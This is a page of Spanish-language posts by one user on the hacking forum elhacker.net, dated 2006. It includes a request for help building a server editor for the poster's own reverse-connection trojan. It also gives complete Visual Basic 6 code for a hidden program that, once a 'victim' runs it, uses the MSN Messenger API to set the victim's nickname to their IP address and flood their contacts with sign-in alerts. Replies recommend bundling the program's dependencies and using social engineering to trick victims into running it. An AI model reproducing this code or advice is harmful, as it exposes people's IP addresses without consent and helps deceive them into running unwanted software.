elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6]
51  Programación / Programación Visual Basic / regedit en: 2 Marzo 2006, 02:59 am
Alguien tiene idea de como bloquear o desbloquear el modoficador de registro de windows (xp) usando visual basic 6.0????????
52  Programación / Programación Visual Basic / Editor Del Server en: 20 Febrero 2006, 05:54 am
Hola necesito que porfavor alguien me explique como podria crear un editor para el server de mi troyano, ya que yo cree mi propio troyano en vb con conexion inversa pero no tengo idea como crear un editor para este. Yo se que esto es incomodo para muchos, que yo les pida esto pero espero que alguien me pueda ayudar.
53  Programación / Programación Visual Basic / Re: Notificacion de la IP de tu victima por MSN en: 20 Febrero 2006, 05:49 am
Si es muy probable que haya mucha gente q no caiga pero si llegaran a caer para que el winsock funcione podrias comprimir el winsock junto con el programa y se lo mandas, creo q deberia de funcionar. Aunque cuando la gente vea que se encuentra el winsock junto al programa debe ser algo sospechoso pero no todos saben de programacion asi que tampoco podriamos decir que es mala idea. Cualquier cosa es posible de hacer si es bien planeada solo se necesita un poco de ingenieria social para engañar a la victima
54  Programación / Programación Visual Basic / Re: Notificacion de la IP de tu victima por MSN en: 20 Febrero 2006, 01:48 am
Pues una pregunta ya te la respondio que es la de donde sacar el winsock y la otra para regresar el nick a su estado original simplemente matas el proceso o cierras el programa y te lo cambias normalmente. Este programa lo que hace es que cada cierto tiempo a la victima se le abra la ventana para cambiar su nick ( la ventana de opciones del msn) y este cambie su nick automaticamente por su ip y aparescan varias ventanas de que ha iniciado sesion para que asi todos puedan ver su ip.
55  Programación / Programación Visual Basic / Re: Notificacion de la IP de tu victima por MSN en: 12 Febrero 2006, 17:19 pm
si ya yo sabia eso solo les queria dar una idea a las personas que no saben, pero gracias igual por esa recomendacion
56  Programación / Programación Visual Basic / Notificacion de la IP de tu victima por MSN en: 12 Febrero 2006, 06:12 am
-Bueno aqui les traigo una idea para hacer que cuando la victima ejecute este programa su nick cambie de nombre  colocando el ip de este en su nick y que cada 10 segundos te aparescan 3 ventanitas mostrando el ip de la victma. Aqui les va el codigo:

Necesitas primero tener:

-El form con la propiedad visible en false
-2 command button
-1 textbox
-2 timer
  *El timer 1 con interval 9000,la propiedad enabled en false.
  *El timer 2 con interval 10000,la propiedad enabled en false.
-1 Winsock
-Agregar a las referencias del proyecto: Messenger APY Type Library

------------------------------------------------------------------------
Private WithEvents MSN As MessengerAPI.Messenger

Private Sub Form_Load()
Set MSN = New MessengerAPI.Messenger
Text1.Text = Winsock1.LocalIP     
Timer1.Enabled = True
End Sub

Private Sub Timer1_Timer()
Call command1_click
End Sub

Private Sub command1_click()
MSN.OptionsPages 0, MOPT_GENERAL_PAGE
MSN.OptionsPages 0, MOPT_GENERAL_PAGE
SendKeys Text1.Text & vbCrLf
Call Command2_Click
End Sub

Private Sub Command2_Click()
MSN.OptionsPages 0, MOPT_GENERAL_PAGE
MSN.OptionsPages 0, MOPT_GENERAL_PAGE
SendKeys Text1.Text & vbCrLf
Timer2.Enabled = True
End Sub

Private Sub Timer2_Timer()
MSN.MyStatus = MISTATUS_INVISIBLE
MSN.MyStatus = MISTATUS_ONLINE
MSN.MyStatus = MISTATUS_INVISIBLE
MSN.MyStatus = MISTATUS_ONLINE
MSN.MyStatus = MISTATUS_INVISIBLE
MSN.MyStatus = MISTATUS_ONLINE
End Sub

A lo mejor algunos se preguntaran porque use dos command button si tienen el mismo uso??, Pues lo hice simplemente para estar mas seguro de que se cambio el nick correctamente porque cuando lo intente con un solo command button aveces no me funcionaba, pero les recomiendo que dejen el codigo como se los puse, aunque ustedes son libres de cambiarlo a su preferencia siempre y cuando digan quien fue la fuente (Redshots).

Páginas: 1 2 3 4 5 [6]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines